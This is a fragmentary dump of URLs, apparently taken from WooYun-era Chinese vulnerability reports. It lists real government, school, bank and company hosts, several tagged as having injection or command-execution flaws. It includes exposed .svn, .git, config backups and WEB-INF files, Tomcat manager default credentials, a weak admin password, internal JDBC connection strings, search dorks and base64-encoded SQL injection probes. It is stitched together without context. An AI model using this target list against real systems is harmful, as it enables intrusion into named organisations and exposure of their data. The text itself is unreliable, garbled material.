http://www.lishixueyuan.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.jljl.lss.gov.cn/bgxz.asp?kind=all http://www.ci123.com/yun/daily.php?d=1&w=1 http://www.phxad.com.cn:80/login.asp https://kaihu.gyzq.com/ kaihu.gyzq.com//Jzkh_photos/img/ http://mingshi.wanfangdata.com.cn/Personal/ScholarResponse.aspx http://www.ijie.com/ http://pt2013.ijie.com/ http://61.177.144.186/config.php.bak http://61.177.144.188/config.php.bak inurl:NewsSystem/shownews.aspx?newsid http://bbs.cnfish.com/uc_server/data/config.inc.php.bak http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=1344 http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=126 http://www.zh171.com/admin/login.aspx http://www.kfpolice.com/zdzxx/admin/mail/maillist.aspx http://www.kfpolice.com/zdzxx/ http://www.metadata.com.cn/cpjs1.asp?ProID=42 http://210.33.44.5:8080/docinfo?docid=302&dbid=2&dbname=%E5%AD%A6%E4%BD%8D%E8%AE%BA%E6%96%87%E5%BA%93 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://www.zgstats.gov.cn/ListNews.php?cid=120 http://www.zgstats.gov.cn/admin/login.php http://www.zdlife.net http://chaoshi.zdlife.net/password http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm http://demo.piaoyou.org http://202.102.72.109:8080/gimis/login.action存在命令执行漏洞 http://www.acgf.org.tw/app/loginchk.asp https://mail.pingxx.com/ http://113.105.64.214:8080/help/help_content.shtml?compid=TEMPUS&p=lectureMenu http://**.**.**/pgps/ http://**.**.**/pgps/system/loginAction_execute.action;jsessionid=5E6082C7F26670DC80DB2A7A8FEFA078 http://file.cits.cn/online/images/cits_logo.ico http://file1.cits.cn/online/images/cits_logo.ico http://file1.cits.cn/css/b2c/common/??layout.css?v=1.0.1 http://file.cits.cn/js/b2c/jquery/??jquery-1.11.2.min.js,jquery.SuperSlide.2.1.js,jquery.jqtransform.js,jquery.DOMWindow.js,jquery.cookie.js,jquery.autocomplete.js,jquery.artDialog.js,jquery.lazyload.min.js?v=1.0.1 http://cfl.shmtu.edu.cn/tzgg_show.aspx?id=313 http://sqlmap.org http://www.vcyber.com/manager/getpositionlist http://www.vcyber.com/Admin/Adminlogin http://www.vcyber.com/UploadFile/2015-6-16-5-42-55-m.aspx http://220.194.62.66/login.jsp http://220.194.62.66/console/login/LoginForm.jsp http://www.lwaj.gov.cn/list.jsp?col=10 http://www.sxz.edu.cn/darkston.jsp http://ztc.120.net/ http://hexin.fudan.edu.cn/index.php,找了几个URL实验名没有什么结果,偶然打开首页某框架URL: http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=6-1&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5%27&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://hexin.fudan.edu.cn/coursetype.php?type=5&term=4 http://www.dzfgj.com/list.aspx?tn=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://180.153.29.44/phpmyadmin/index.php http://cs.yuncheng.com:80/.svn/entries http://gys.cvte.cn/wp-admin/.svn/entries http://gys.cvte.cn/wp-content/.svn/entries www.to8to.com/my/yezhu_management.php?act=update_data&aid=1826 http://cgs.ycga.gov.cn/ http://www.asp168.com/default.php?mod=c&s=ss0149a5b http://jifen.xunlei.com/jifen/exchange/group/0/type/2/searchName/1%25 http://218.78.217.68/yyoa/index.jsp http://123.56.90.28/main https://selcrs.nsysu.edu.tw/newstu/STU_NEW.ASP?ACTION=16 http://chaoshi.zdlife.net/streetDetail?id=ff8080814a7f4c49014a846c5a0316cf&cur=1 http://chaoshi.zdlife.net/street?cur=1&x=2&t=ff8080814a285e2f014a28c3f5260183 http://dxll.csairholiday.com/ www.sjzipo.gov.cn/admin/,通过弱口令admin http://www.ks2y.com/cms/LD.aspx?LMID=23 http://www.zchospital.com/cms/LD.aspx?LMID=23 http://www.zjcc.org.cn:8000//cms/LD.aspx?LMID=23 http://www.ksskfyy.com//cms/LD.aspx?LMID=23 http://www.zjqhyy.com/cms/LD.aspx?LMID=11 http://ywzxyy.com/cms/LD.aspx?LMID=12 http://baike.anjuke.com/index.php http://kankan.baidu.com/Play/live/20afcfc717eb44f03c288018ff70332a/476057949/1/a=0/offset http://kankan.baidu.com/Play/live/9b29a20cb75a1473fbcc39857d9dcd38/476057949/1/a=0/offset http://www.xensystem.test.com/?vi=后面的数字ID,你将看到惊人的一幕: http://b.cart.suning.com/largePurchase.do http://www.vpclub.cn/log.txt http://www.vpclub.cn/info.php http://hpmanagern.fang.com/.svn/entries http://jxt.hi165.com/index2/index.jsp http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid= http://221.193.216.78/cgs/myweb/w_ShowNew.aspx?xh=20121220090749312 http://union.lashou.com/index.php?r=setting/bank/index http://union.lashou.com/?r=setting/bank/dynamiccities http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=* http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=* http://61.138.243.15:81/index.aspx http://id.371.cn/ com.xywy.ask/com.xywy.ask.activity.MyPlusDetailActivity;end http://www.ektianxia.cn/ http://webschool.xgrsks.cn/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000004 http://testa.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000012 http://110.249.254.157:10001/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000014 http://test6.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000004 http://peixun.hnedu.cn/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000001 http://test2.ektianxia.com/CaiStudy1.aspx?cls_no=000001&cai_no=KJ000055 http://www.bctb.gov.cn:80/news/read.asp?id=1306 http://www.BCTB.gov.cn:80/news/read.asp?id=1306 http://www.BCTB.gov.cn:80/news/read.asp?id=1306 http://www.bctb.gov.cn:80/news/read.asp?id=1306 http://**.**.**.**/bugs/wooyun-2015-0103334另一处 inurl:8080/rcc/ http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://**.**.**.**:8080/rcc/servlet/complaintsMgrServletid=4 http://www.wooyun.org/whitehats/北京方便面 http://www.yiqifa.com:8888/ http://fed.lvmama.com/wp-login.php http://edu.irongke.com/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://www.monelostar.com/ks/Admin/Policy/PolicyDownload.aspx?PolicyId=13 http://test2.ektianxia.com/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://peixun.yiling.cn:8081/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://webschool.xgrsks.cn//Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://110.249.254.157:10001//Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://peixun.hnedu.cn/Admin/Policy/PolicyDownload.aspx?PolicyId=7 http://222.191.250.100:81/ http://f.72dns.com/test.aspx http://www.zendaimoney.com/spenewslist.php?typeid=10 http://www.zendaimoney.com/spenewsDetail.php?id=14 http://www.zendaimoney.com/spenewslist.php?typeid=10 http://223.67.133.9:81/syxdzts/gl_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_shan.asp?id= http://112.4.228.169:880/gl_shan.asp?id= http://ebook.lygfls.com/gl_shan.asp?id= http://www.hssqjy.com/dzts/gl_shan.asp?id= http://www.gyxsqex.com/tushu/gl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_0.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_0.asp?id= http://112.4.228.169:880/gl_tj_0.asp?id= http://ebook.lygfls.com/gl_tj_0.asp?id= http://www.hssqjy.com/dzts/gl_tj_0.asp?id= http://www.gyxsqex.com/tushu/gl_tj_0.asp?id= http://www.dhtfxx.com/tushu/gl_tj_0.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_1.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_1.asp?id= http://112.4.228.169:880/gl_tj_1.asp?id= http://ebook.lygfls.com/gl_tj_1.asp?id= http://www.hssqjy.com/dzts/gl_tj_1.asp?id= http://www.gyxsqex.com/tushu/gl_tj_1.asp?id= http://www.dhtfxx.com/tushu/gl_tj_1.asp?id= http://223.67.133.9:81/syxdzts/gl_tj_2.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tj_2.asp?id= http://112.4.228.169:880/gl_tj_2.asp?id= http://ebook.lygfls.com/gl_tj_2.asp?id= http://www.hssqjy.com/dzts/gl_tj_2.asp?id= http://www.gyxsqex.com/tushu/gl_tj_2.asp?id= http://www.dhtfxx.com/tushu/gl_tj_2.asp?id= http://223.67.133.9:81/syxdzts/gl_tuijian_1.asp http://lsxnmxx.js.cn:41516/tushu/gl_tuijian_1.asp http://112.4.228.169:880/gl_tuijian_1.asp http://ebook.lygfls.com/gl_tuijian_1.asp http://www.hssqjy.com/dzts/gl_tuijian_1.asp http://www.gyxsqex.com/tushu/gl_tuijian_1.asp http://www.dhtfxx.com/tushu/gl_tuijian_1.asp http://223.67.133.9:81/syxdzts/gl_tz_add2.asp http://lsxnmxx.js.cn:41516/tushu/gl_tz_add2.asp http://112.4.228.169:880/gl_tz_add2.asp http://ebook.lygfls.com/gl_tz_add2.asp http://www.hssqjy.com/dzts/gl_tz_add2.asp http://www.gyxsqex.com/tushu/gl_tz_add2.asp http://www.dhtfxx.com/tushu/gl_tz_add2.asp http://223.67.133.9:81/syxdzts/gl_tz_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tz_shan.asp?id= http://112.4.228.169:880/gl_tz_shan.asp?id= http://ebook.lygfls.com/gl_tz_shan.asp?id= http://www.hssqjy.com/dzts/gl_tz_shan.asp?id= http://www.gyxsqex.com/tushu/gl_tz_shan.asp?id= http://www.dhtfxx.com/tushu/gl_tz_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_tz_she.asp?zt=1&id=1 http://lsxnmxx.js.cn:41516/tushu/gl_tz_she.asp?zt=1&id=1 http://112.4.228.169:880/gl_tz_she.asp?zt=1&id=1 http://ebook.lygfls.com/gl_tz_she.asp?zt=1&id=1 http://www.hssqjy.com/dzts/gl_tz_she.asp?zt=1&id=1 http://www.gyxsqex.com/tushu/gl_tz_she.asp?zt=1&id=1 http://www.dhtfxx.com/tushu/gl_tz_she.asp?zt=1&id=1 http://223.67.133.9:81/syxdzts/gl_tz_xian.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_tz_xian.asp?id= http://112.4.228.169:880/gl_tz_xian.asp?id= http://ebook.lygfls.com/gl_tz_xian.asp?id= http://www.hssqjy.com/dzts/gl_tz_xian.asp?id= http://www.gyxsqex.com/tushu/gl_tz_xian.asp?id= http://www.dhtfxx.com/tushu/gl_tz_xian.asp?id= http://223.67.133.9:81/syxdzts/gl_us_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_us_shan.asp?id= http://112.4.228.169:880/gl_us_shan.asp?id= http://ebook.lygfls.com/gl_us_shan.asp?id= http://www.hssqjy.com/dzts/gl_us_shan.asp?id= http://www.gyxsqex.com/tushu/gl_us_shan.asp?id= http://www.dhtfxx.com/tushu/gl_us_shan.asp?id= http://223.67.133.9:81/syxdzts/gl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_xiu.asp?id= http://112.4.228.169:880/gl_xiu.asp?id= http://ebook.lygfls.com/gl_xiu.asp?id= http://www.hssqjy.com/dzts/gl_xiu.asp?id= http://www.gyxsqex.com/tushu/gl_xiu.asp?id= http://www.dhtfxx.com/tushu/gl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_xiu2.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_xiu2.asp?id= http://112.4.228.169:880/gl_xiu2.asp?id= http://ebook.lygfls.com/gl_xiu2.asp?id= http://www.hssqjy.com/dzts/gl_xiu2.asp?id= http://www.gyxsqex.com/tushu/gl_xiu2.asp?id= http://www.dhtfxx.com/tushu/gl_xiu2.asp?id= http://223.67.133.9:81/syxdzts/guanli2.asp http://lsxnmxx.js.cn:41516/tushu/guanli2.asp http://112.4.228.169:880/guanli2.asp http://ebook.lygfls.com/guanli2.asp http://www.hssqjy.com/dzts/guanli2.asp http://www.gyxsqex.com/tushu/guanli2.asp http://www.dhtfxx.com/tushu/guanli2.asp http://223.67.133.9:81/syxdzts/default.asp http://lsxnmxx.js.cn:41516/tushu/default.asp http://112.4.228.169:880/default.asp http://ebook.lygfls.com/default.asp http://www.hssqjy.com/dzts/default.asp http://www.gyxsqex.com/tushu/default.asp http://www.dhtfxx.com/tushu/default.asp http://223.67.133.9:81/syxdzts/mafen.asp?shuxing=1 http://lsxnmxx.js.cn:41516/tushu/mafen.asp?shuxing=1 http://112.4.228.169:880/mafen.asp?shuxing=1 http://ebook.lygfls.com/mafen.asp?shuxing=1 http://www.hssqjy.com/dzts/mafen.asp?shuxing=1 http://www.gyxsqex.com/tushu/mafen.asp?shuxing=1 http://www.dhtfxx.com/tushu/mafen.asp?shuxing=1 http://223.67.133.9:81/syxdzts/mafen2.asp?shuxing=1 http://lsxnmxx.js.cn:41516/tushu/mafen2.asp?shuxing=1 http://112.4.228.169:880/mafen2.asp?shuxing=1 http://ebook.lygfls.com/mafen2.asp?shuxing=1 http://www.hssqjy.com/dzts/mafen2.asp?shuxing=1 http://www.gyxsqex.com/tushu/mafen2.asp?shuxing=1 http://www.dhtfxx.com/tushu/mafen2.asp?shuxing=1 http://223.67.133.9:81/syxdzts/ping_cha.asp?mingcheng=1 http://lsxnmxx.js.cn:41516/tushu/ping_cha.asp?mingcheng=1 http://112.4.228.169:880/ping_cha.asp?mingcheng=1 http://ebook.lygfls.com/ping_cha.asp?mingcheng=1 http://www.hssqjy.com/dzts/ping_cha.asp?mingcheng=1 http://www.gyxsqex.com/tushu/ping_cha.asp?mingcheng=1 http://www.dhtfxx.com/tushu/ping_cha.asp?mingcheng=1 http://223.67.133.9:81/syxdzts/ping_hao.asp?mingcheng=1 http://lsxnmxx.js.cn:41516/tushu/ping_hao.asp?mingcheng=1 http://112.4.228.169:880/ping_hao.asp?mingcheng=1 http://ebook.lygfls.com/ping_hao.asp?mingcheng=1 http://www.hssqjy.com/dzts/ping_hao.asp?mingcheng=1 http://www.gyxsqex.com/tushu/ping_hao.asp?mingcheng=1 http://www.dhtfxx.com/tushu/ping_hao.asp?mingcheng=1 http://223.67.133.9:81/syxdzts/pl_add.asp?id= http://lsxnmxx.js.cn:41516/tushu/pl_add.asp?id= http://112.4.228.169:880/syxdzts/pl_add.asp?id= http://ebook.lygfls.com/syxdzts/pl_add.asp?id= http://www.hssqjy.com/dzts/pl_add.asp?id= http://www.gyxsqex.com/tushu/pl_add.asp?id= http://www.dhtfxx.com/tushu/pl_add.asp?id= http://223.67.133.9:81/syxdzts/search.asp?keywords=1&shuxing=1 http://lsxnmxx.js.cn:41516/tushu/search.asp?keywords=1&shuxing=1 http://112.4.228.169:880/syxdzts/search.asp?keywords=1&shuxing=1 http://ebook.lygfls.com/syxdzts/search.asp?keywords=1&shuxing=1 http://www.hssqjy.com/dzts/search.asp?keywords=1&shuxing=1 http://www.gyxsqex.com/tushu/search.asp?keywords=1&shuxing=1 http://www.dhtfxx.com/tushu/search.asp?keywords=1&shuxing=1 http://www.dhtfxx.com/tushu/search.asp?keywords=1&shuxing=1 http://223.67.133.9:81/syxdzts/pl_add.asp?id= http://202.100.81.114:8080/bdcp/newlogin.jsp http://you.ctrip.com/membersite/ajax/addfriend.ashx http://www.xiangguo.com http://www.to8to.com/my/ask.php?status=2 http://m.trip.cmbchina.com/commbusiness-visa/orderSuccess.action?tradeId=200000 http://m.trip.cmbchina.com/commbusiness-visa/orderSuccess.action?tradeId=807000 site:m.ly.com http://120.27.42.238:8080/ http://120.27.42.238:8080/job/zader/com.liubo$zader/ws/src/main/webapp/bha-index.html/*view*/ http://dgdz.xzit.edu.cn/model/TwoGradePage/jifenbz.aspx?columnId=271 http://sys.zafu.edu.cn:81/model/TwoGradePage/jifenbz.aspx?columnId=271 http://hzhlab.hytc.edu.cn/model/TwoGradePage/jifenbz.aspx?columnId=271 http://182.129.150.10:8001/model/TwoGradePage/jifenbz.aspx?columnId=271 http://labch.cumt.edu.cn:81/model/TwoGradePage/jifenbz.aspx?columnId=271 http://182.129.150.10:8001/model/TwoGradePage/jxkj.aspx?columnId=25 http://202.114.33.72/model/TwoGradePage/jxkj.aspx?columnId=25 http://210.43.24.201:8080/model/TwoGradePage/jxkj.aspx?columnId=25 http://hzhlab.hytc.edu.cn/model/TwoGradePage/jxkj.aspx?columnId=25 http://labch.cumt.edu.cn:81/model/TwoGradePage/jxkj.aspx?columnId=25 http://dgdz.xzit.edu.cn/model/TwoGradePage/jxkj.aspx?columnId=25 http://www.duomai.com/index.php?a=ajax_check_email&clientid=email&email=XXXXXXX&m=siter&_=1434377421327 http://passport2.cngold.org/account/password/forgot.htm?service= http://inner.sfn.cn/ url:http://220.170.91.9:8088/manager/html user:tomcat pass:tomcat http://221.122.127.36:9090/wap/index.do http://www.bailumei.net/blm/open/pg/beautician/find_all?page=1 http://my.elong.com/me_saveAddress jdbc:mysql://192.168.5.112:3306/yiqifa_bs?useUnicode=true&characterEncoding=utf-8&autoReconnect=true&useOldAliasMetadataBehavior=true"/ jdbc:mysql://221.122.127.106:3306/gouwuke?useUnicode=true&characterEncoding=utf-8 http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=Mjk= http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=Mjkgb3JkZXIgYnkgOC0t URL:http://px2.timber2005.com/WebPage/kc_content.aspx?tid=NDAyMA==&cid=MjkgYW5kIEBAVkVSU0lPTiBMSUtFICclMjAwMCUnLS0= http://lexue.yonyou.com/News.aspx?typeid=36 http://www.njgjj.com/ http://baike.anjuke.com/index.php http://adm.anjuke.com/login.action安居客大数据平台 http://www.edingtou.com/member/common/forgetpwd1 http://jhldf.ahtv.cn http://wooyun.org/bugs/wooyun-2014-065559 http://jhldf.ahtv.cn/0.php http://www2.easou.com:8080/ www2.easou.com:8080 http://**.**.**.**/extmail/cgi/index.cgi http://mhz.pw/game/SOP/01.php http://www.agrij.com/) http://61.178.243.127:8081/finance_yc/monitor/cmgkb_gk.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc/monitor/cmgkb_gk.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03/monitor/cmgkb_gk.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/monitor/cmgkb_gk.jsp?village_dm=0110004 http://221.180.22.229:8080/finance/monitor/cmgkb_gk.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/monitor/zxgk_form.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc//monitor/zxgk_form.jsp?village_dm=0106010 http://218.59.175.234:8080/finance03//monitor/zxgk_form.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/zxgk_form.jsp?village_dm=0106010 http://61.178.243.127:8081/finance_yc//monitor/zxgk_form.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/init/resource_change_list1.jsp?village_dm=0105005 http://hcnl.gov.cn:8082/finance_hc//init/resource_change_list1.jsp?village_dm=0105005 http://218.59.175.234:8080/finance03//init/resource_change_list1.jsp?village_dm=0105005 http://61.178.243.127:8081/finance_yc//init/resource_change_list1.jsp?village_dm=0105005 http://221.180.22.229:8080/finance//init/resource_change_list1.jsp?village_dm=0105005 http://124.164.240.217:8080/finance03/reports/szgk_form.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc//reports/szgk_form.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03//reports/szgk_form.jsp?village_dm=0110004 http://61.178.243.127:8081/finance_yc///reports/szgk_form.jsp?village_dm=0110004 http://221.180.22.229:8080/finance//reports/szgk_form.jsp?village_dm=0110004 http://124.164.240.217:8080/finance03/reports/szgk_form1.jsp?village_dm=0110004 http://hcnl.gov.cn:8082/finance_hc//reports/szgk_form1.jsp?village_dm=0110004 http://218.59.175.234:8080/finance03//reports/szgk_form1.jsp?village_dm=0110004 http://61.178.243.127:8081/finance_yc///reports/szgk_form1.jsp?village_dm=0110004 http://221.180.22.229:8080/finance//reports/szgk_form1.jsp?village_dm=0110004 http://jn.qlrc.com/a.zip user:admin http://www.10010-nm.com/?zh=047104011167 http://www.10010-nm.com/?zh=047104011154 http://www.10010-nm.com:8088/ http://www.pzhb.gov.cn inurl:Regist.asp http://www.wjllzx.com/dlib/Main.asp http://www.e-zc.com:8080/dlib/Main.asp http://www.sipdsh.com/Dlib/Main.asp http://www.jjjszxx.com:8080/Main.asp http://www.jxwaez.cn/dlib/Main.asp http://g.91game.com:80/ http://222.76.243.13:90/UserReg.asp?action=AddMemberOk存在注入漏洞 http://www.dianwoba.com http://hzjj.hzga.gov.cn/Web/Files/Bgxz/aspx_20150616195734.aspx http://bjjj.baoji.gov.cn/web/Files/Bgxz/aspx_20150616194928.aspx www.butel.com,CDN登陆系统入口是 http://114.112.74.18/Account/Logon http://www.yiwencaifu.com/pwd http://116.1.180.114/index.php?view=newslist&cid=31存在注入漏洞 http://116.1.180.114:8081/esm/login.action存在post注入 http://www.hsyr.pudong-edu.sh.cn/ http://www.shjzzx.com/ http://www.psjm.pudong-edu.sh.cn/ http://chxx.edu.sh.cn/ http://syxx.mhedu.sh.cn/ http://webmail.xinnet.com http://webmail.xinnet.asia/ http://webmail.xinnet.asia/app/eadmin/msetnav http://webmail.xinnet.com http://www.leiphone.com/test.php www.ujipin.com/api/weixin.php?act=login_bind http://www.hggbzx.gov.cn/homeweb/index_homepage.action http://services.wifi.meituan.com/.git/config http://jc.meituan.net/.git/config http://www.bbmsa.gov.cn/admin/index.htm http://221.122.127.68/ecshop+lampp.txt http://www.gbcom.com.cn/index.aspx?cat_code=yysWLANcp www.xintai.com http://www.xintai.com http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/customtablecontent.jsp?fid=10475&fmodule_code=5700&fname=%B5%DA%B6%FE%BD%EC%C7%E5%BB%AA%B4%F3%D1%A7%D3%C5%D0%E3%BD%CC%B2%C4%C6%C0%D1%A1%A3%A81992%C4%EA%A3%A9&module_code=5705 http://dzhouse.dzwww.com//WEB-INF/classes/log4j.properties http://dzhouse.dzwww.com/WEB-INF/web.xml http://dzhouse.dzwww.com//WEB-INF/struts-confi http://wiki.dev.renren.com http://wiki.dev.renren.com/wiki/Special:Listusers http://bb.renren.com/ https://passport.renren-inc.com/ http://3g.mop.com/login.html?targetUrl=/hi/index.html http://e.lvmama.com/ebooking/ebooking/task/enquireSeatOrderTaskByVst.do?vst=true&ebkTaskId=200896 https://ssl.cec.com.cn https://ssl1.cec.com.cn www.alibaba-tw.com www.alibaba-tw.com/ http://www.alibaba-tw.com/managementcenter/ ftp://211.72.206.48/ android:configChanges="keyboardHidden|orientation android:name="lib.com.google.zxing.client.android.encode.EncodeActivity android:screenOrientation="portrait android:theme="@android:style/Theme.NoTitleBar android:windowSoftInputMode="stateAlwaysHidden android:name="com.bill99.kuaiqian.ENCODE"/ android:name="android.intent.category.DEFAULT"/ http://fax.sfn.cn:80/feat/MoneySell.aspx http://101.227.250.142:9003/imageCenter_tj/ http://101.227.250.142:5555/ http://oa.hbwsjd.gov.cn/ http://www.bocichina.com/boci/login/forgetPassword.jsp http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml padding:10px http://www.lxrcb.com/lxrcb.rar http://www.whjsrcb.com/web.rar http://www.bxcq.cn/bxcq/ http://www.yangguangnet.com/web/resources/css/menu.jsp www.yangguangnet.com http://61.155.152.155/ http://www.yangguangnet.com/web/cd2.jsp www.xinnet.com qinghu.gov.cn/qinghu.gov.cn.apachelog0907/tomcat/conf/ http://125.89.65.227:8081/manager/html http://photo.xitek.com:81/.svn/entries http://www.casicloud.com/capabilityListNew_v2.ht?type=2000 http://www.casicloud.com/capabilityListNew_v2.ht?type=2000 http://www.ccjdw.com/pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.jljszj.gov.cn//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.thszjz.com//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.spjdz.com///pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://218.7.239.170:81//pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.csjszj.cn/pkpmbs/CMQuery/CommonManager/QueryDefineList.aspx http://www.ccjdw.com/pkpmbs//common/MessageManageList.aspx http://www.hyjsjd.cn/pkpmbs//common/MessageManageList.aspx http://www.csjszj.cn//pkpmbs//common/MessageManageList.aspx http://218.7.239.170:81//pkpmbs//common/MessageManageList.aspx http://www.spjdz.com//pkpmbs//common/MessageManageList.aspx http://www.ccjdw.com//pkpmbs/consmodel/TBpAreaList.aspx http://www.jljszj.gov.cn//pkpmbs/consmodel/TBpAreaList.aspx http://www.thszjz.com//pkpmbs/consmodel/TBpAreaList.aspx http://www.spjdz.com//pkpmbs/consmodel/TBpAreaList.aspx http://218.7.239.170:81//pkpmbs/consmodel/TBpAreaList.aspx http://www.csjszj.cn//pkpmbs/consmodel/TBpAreaList.aspx http://www.ccjdw.com/pkpmbs/jddoc/DocRightsUserList.aspx http://www.jljszj.gov.cn//pkpmbs/jddoc/DocRightsUserList.aspx http://www.thszjz.com//pkpmbs/jddoc/DocRightsUserList.aspx http://www.spjdz.com//pkpmbs/jddoc/DocRightsUserList.aspx http://218.7.239.170:81//pkpmbs/jddoc/DocRightsUserList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/AccountQueryList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/AccountQueryList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/AccountQueryList.aspx http://www.thszjz.com/pkpmbs//jdmanage/AccountQueryList.aspx http://www.spjdz.com/pkpmbs//jdmanage/AccountQueryList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/CCStandLibList.aspx http://218.7.239.170:81//pkpmbs//jdmanage/CCStandLibList.aspx http://www.jljszj.gov.cn//pkpmbs//jdmanage/CCStandLibList.aspx http://www.thszjz.com//pkpmbs//jdmanage/CCStandLibList.aspx http://www.spjdz.com//pkpmbs//jdmanage/CCStandLibList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/DepartmentList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/DepartmentList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/DepartmentList.aspx http://www.thszjz.com/pkpmbs//jdmanage/DepartmentList.aspx http://www.spjdz.com/pkpmbs//jdmanage/DepartmentList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/JTdCustomList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/JTdCustomList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/JTdCustomList.aspx http://www.thszjz.com/pkpmbs//jdmanage/JTdCustomList.aspx http://www.spjdz.com/pkpmbs//jdmanage/JTdCustomList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.thszjz.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.spjdz.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/RptRightsUserList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/SNList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/SNList.aspx http://www.thszjz.com/pkpmbs//jdmanage/SNList.aspx http://www.spjdz.com/pkpmbs//jdmanage/SNList.aspx 